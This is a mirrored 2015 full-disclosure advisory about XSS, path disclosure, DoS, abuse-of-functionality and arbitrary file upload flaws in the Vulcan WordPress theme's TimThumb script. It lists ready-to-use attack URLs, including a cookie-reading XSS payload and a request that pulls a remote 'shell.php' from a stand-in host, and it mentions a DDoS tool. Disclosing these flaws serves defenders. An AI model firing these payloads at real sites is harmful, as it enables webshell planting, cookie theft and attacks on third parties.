Lucene search

K
securityvulnsSecurityvulnsSECURITYVULNS:DOC:32304
HistoryJul 05, 2015 - 12:00 a.m.

Multiple vulnerabilities in Vulcan theme for WordPress + WAF bypass

2015-07-0500:00:00
vulners.com
25

Hello 3APA3A!

Let's back to vulnerabilities, which I disclosed in April 2011, which can be used for DDoS attacks on other sites, e.g. with my DAVOSET (http://seclists.org/fulldisclosure/2015/Jun/111). In addition to hundreds of themes, which I wrote about in previous years, here is another theme for WordPress, which still didn't fix all holes and there are many sites with old version of theme (+ WAF bypass).

I want to warn you about multiple vulnerabilities in Vulcan theme for WordPress. This is commercial theme for WP.

These are Cross-Site Scripting, Full path disclosure, Abuse of Functionality, Denial of Service and Arbitrary File Upload vulnerabilities.

In 2011 I wrote about Cross-Site Scripting, Full path disclosure, Abuse of Functionality and Denial of Service vulnerabilities in TimThumb and multiple themes for WordPress (http://seclists.org/fulldisclosure/2011/Apr/227), and later also was disclosed Arbitrary File Uploading vulnerability.


Affected products:

Vulnerable are all versions of Vulcan theme for WordPress (in last versions there were fixed only vulnerabilities in TimThumb, but there are still FPD in other php-files).

Since version TimThumb 2.8 all vulnerabilities are fixed (in timthumb.php). But AoF and DoS holes are fixed by disabling external hosts by default. If to change settings (to allow individual or all external hosts), which is allowed by software, then it's possible to conduct attacks on other sites. E.g. with using of DAVOSET.

WAF bypass:

At many sites unfixed version of TimThumb in theme is used, but they protect themselves using WAF (such as ModSecurity). Note, that WAF doesn't protect against FPD holes in this theme and TimThumb, and in some cases it doesn't protect against AoF and DoS.


Details:

XSS (WASC-08) (in old versions TimThumb):

http://site/wp-content/themes/vulcan/timthumb.php?src=%3Cbody%20onload=alert(document.cookie)%3E.jpg

Full path disclosure (WASC-13):

http://site/wp-content/themes/vulcan/timthumb.php?src=1
http://site/wp-content/themes/vulcan/timthumb.php?src=http://site/page.png&h=1&w=1111111
http://site/wp-content/themes/vulcan/timthumb.php?src=http://site/page.png&h=1111111&w=1

Abuse of Functionality (WASC-42):

http://site/wp-content/themes/vulcan/timthumb.php?src=http://site&h=1&w=1
http://site/wp-content/themes/vulcan/timthumb.php?src=http://site.badsite.com&h=1&w=1 (bypass of restriction on domain, if such restriction is turned on)

DoS (WASC-10):

http://site/wp-content/themes/vulcan/timthumb.php?src=http://site/big_file&h=1&w=1
http://site/wp-content/themes/vulcan/timthumb.php?src=http://site.badsite.com/big_file&h=1&w=1 (bypass of restriction on domain, if such restriction is turned on)

About such Abuse of Functionality and Denial of Service vulnerabilities you can read in my article Using of the sites for attacks on other sites (http://lists.grok.org.uk/pipermail/full-disclosure/2010-June/075384.html).

Arbitrary File Upload (WASC-31) (in old versions of TimThumb):

http://site/wp-content/themes/vulcan/timthumb.php?src=http://site.badsite.com/shell.php

Full path disclosure (WASC-13):

http://site/wp-content/themes/vulcan/

Besides index.php there are also potentially FPD in other php-files of this theme.


Timeline:

2011.02.01 - informed developers from WooThemes about holes in their themes.
2011.02.04-12 - conversation about fixing holes in all their themes for WP.
2011.02.07 - announced at my site.
2011.02.08 - informed developer of TimThumb.
2011.02.13 - developer of TimThumb released version 1.25.
2011.02.13 - developers from WooThemes begun updating TimThumb in all their themes.
2011.04.13 - disclosed at my site about TimThumb and multiple themes.
2015.07.02 - disclosed at my site about Vulcan theme.

I mentioned about these vulnerabilities at my site (http://websecurity.com.ua/7850/).

Best wishes & regards,
MustLive
Administrator of Websecurity web site
http://websecurity.com.ua